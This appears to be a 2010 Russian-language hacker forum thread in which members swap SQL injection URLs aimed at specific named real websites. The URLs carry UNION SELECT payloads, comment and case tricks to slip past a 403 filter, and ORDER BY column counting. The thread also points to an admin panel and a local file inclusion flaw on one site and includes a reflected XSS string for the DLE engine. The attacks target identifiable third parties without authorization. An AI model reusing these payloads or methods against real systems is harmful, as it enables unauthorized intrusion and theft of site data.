14.07.2010, 21:00
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
Сообщение от haito
Код:
http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1
Ошибка 403.
А вот так:
Код:
http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+
Работает.
Как обойти?
Код:
http://www.crossfitnb.com/archive.php?month=-2009-03%27+Union+select+1,2,3,4,version(),6,7,8,9,10+--+
|
|
|
14.07.2010, 22:18
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...
|
|
|
|
14.07.2010, 23:11
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
С нами:
10886786
Репутация:
685
|
|
Сообщение от 547
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...
там нет ничего
|
|
|
|
14.07.2010, 23:58
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от 547
всем привет!
-->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?st rona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
не могу найти принтабельное поле...
можно вопрос? как вы узнали сколько там полей? спасибо.
|
|
|
|
15.07.2010, 00:02
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Konqi
можно вопрос? как вы узнали сколько там полей? спасибо.
да как всегда, через order by по выводу ошибки
-->Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/mobilex.pl/banery.php
|
|
|
|
15.07.2010, 00:19
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
С нами:
10886786
Репутация:
685
|
|
Сообщение от Konqi
можно вопрос? как вы узнали сколько там полей? спасибо.
id=-153 order by 8++&stronaok=dysfunkcja%20uk%B3adu%20nerwowego
Здесь есть второй под запрос.
http://www.mobilex.pl/istats5/login.php
http://www.filipov.pl/istats5/index.php?p=admin - раскопаешь этот двиг = Profit!
я уже LFI в нём нашёл http://www.mobilex.pl//istats5/winday.php?r=ololo
Остальное за тобой.
|
|
|
|
15.07.2010, 01:12
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от AC//DC
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2, 3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+ad min
чтобы всё так просто было не постил бы
|
|
|
|
15.07.2010, 14:24
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
Сообщение от Gorev
у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..
вот и хотелось бы узнать, что я не так делаю, а не слушать тут пустые наезды и понты
|
|
|
|
15.07.2010, 15:23
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами:
8633638
Репутация:
0
|
|
Есть псивная xss в DLE.
Сообщение от None
site.ru/engine/modules/imagepreview.php?image=javajavascriptscript:alert( String.fromCharCode(120,115,115))
При открытии ее в строке,страница сворачивается и все. Как можно хотя бы, вывести алерт? Должен вылететь алерт с надписью xss... Но ничего не происходит. |
|
|
|
15.07.2010, 16:52
|
|
Новичок
Регистрация: 10.07.2010
Сообщений: 8
С нами:
8337206
Репутация:
0
|
|
Почему не показывают версии?
http://www.catpaisatge.net/dossiers/jardins/eng/jardins_historics.php?idZona=244%29%20union%20sEle ct%20version%28%29+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
![Аватар для NaX[no]rT](/avatars/avatar18908.jpg?2251710){kind=avatar}
![Аватар для NaX[no]rT](/avatars/avatar18908.jpg?2251804){kind=avatar}
Похожие темы
Комбинированный вид
